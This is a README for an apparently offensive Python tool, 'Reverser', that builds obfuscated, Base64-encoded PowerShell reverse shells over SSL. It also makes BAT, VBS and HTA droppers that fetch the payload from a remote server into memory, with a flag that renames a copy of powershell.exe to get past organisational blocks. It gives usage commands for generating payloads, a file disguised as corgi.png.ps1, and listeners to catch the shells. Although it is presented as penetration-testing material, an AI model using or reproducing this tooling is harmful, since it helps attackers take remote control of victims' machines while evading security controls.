Reverse is a Python-based tool designed to generate obfuscated PowerShell scripts or batch files for establishing a reverse shell with SSL encryption. This tool can help in penetration testing scenarios where the goal is to bypass security mechanisms and establish a secure connection to a target machine.
- Reverse Shell with SSL Encryption: Generates PowerShell scripts that establish an encrypted reverse shell connection using SSL.
- Obfuscation: Each generated PowerShell script uses randomly selected variable names to avoid signature-based detection by security tools.
- Base64 Encoding: The PowerShell scripts are encoded in Base64 for additional obfuscation.
- Batch File Generation: Create a batch file that downloads and executes the encoded PowerShell script directly from a remote server.
- VBS File Generation: Create a VBS file that downloads and executes the encoded PowerShell script directly from a remote server.
- HTA File Generation: Create a HTA file that downloads and executes the encoded PowerShell script directly from a remote server.
- Customizable: Users can specify the IP address, port, and server URL for downloading the PowerShell script.
- Python 3.x
- OpenSSL (for certificate generation)
Clone the repository:
python3 -m venv Reverser
sourve Reverser/bin/active
cd Reverse
git clone https://github.com/ShkudW/Reverser.git
cd Reverser
pip install -r requirements.txt
The tool can generate Three types of files, as chosen by the user:
- A single PS1 file with obfuscation and Base64 encoding containing a Reverse shell payload.
- An encoded BAT file that connects to a remote server to download and Execute the encoded PS1 file.
- A VBS file that connects to a remote server to download and Execute the encoded PS1 file.
- A HTA file that connects to a remote server to download and Execute the encoded PS1 file.
The BAT, HTA and VBS files, during their initial request to the server to download the PS1 into memory, are executed over an encrypted channel using a Self-Signed Certificate. After downloading the PS1 file into memory, the BAT and VBS files will decode the script and establish an encrypted communication channel to create the Reverse Shell
This way, we can ensure that the communication is encrypted end-to-end.
Creating only a PS1 file (obfuscated and Based64 encoded):
python3 Reverser.py -ip <Your_IP> -port <Your_PORT> -type ps1
Creating a VBS file with the tool and transferring it to the listener's directory:
python3 Reverser.py -ip <Your_IP> -port <Your_PORT> -type vbs -server https://<Your_Listener_Server_IP_For_Downloadin_PS1/download/photo/corgi.png.ps1>
Creating a BAT file with the tool and transferring it to the listener's directory:
python3 Reverser.py -ip <Your_IP> -port <Your_PORT> -type bat -server https://<Your_Listener_Server_IP_For_Downloadin_PS1/download/photo/corgi.png.ps1>
Opening The listeners:
Opening a listener with the OpenSSL server to receive the Reverse shell connection:
openssl s_server -accept <Your_PORT> -cert reception.pem -key reception.key -quiet
open a listener with our server to handle the initial connection for downloading the PS1 file from the BAT/VBS file:
python3 listener.py -https_port|-http_port <Your_Listener_Server_PORT>
Getting an encrypted Reverse Shell after downloading the PS1 file to the memory via encrypted connection:
Update to the tool: I added the -lolbas flag. In this mode, the use of this flag will only apply when creating a VBS file. In scenarios where the use of powershell.exe is blocked within organizations, the script will create a VBS file that copies powershell.exe from its original path:
'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
to a new location where the user executing the payload has write permissions, and it will generate a new name for the powershell.exe file (each time, a different name will be generated).
This way, the download of the ReverseShell payload in PS1 format will run from the newly created powershell.exe file: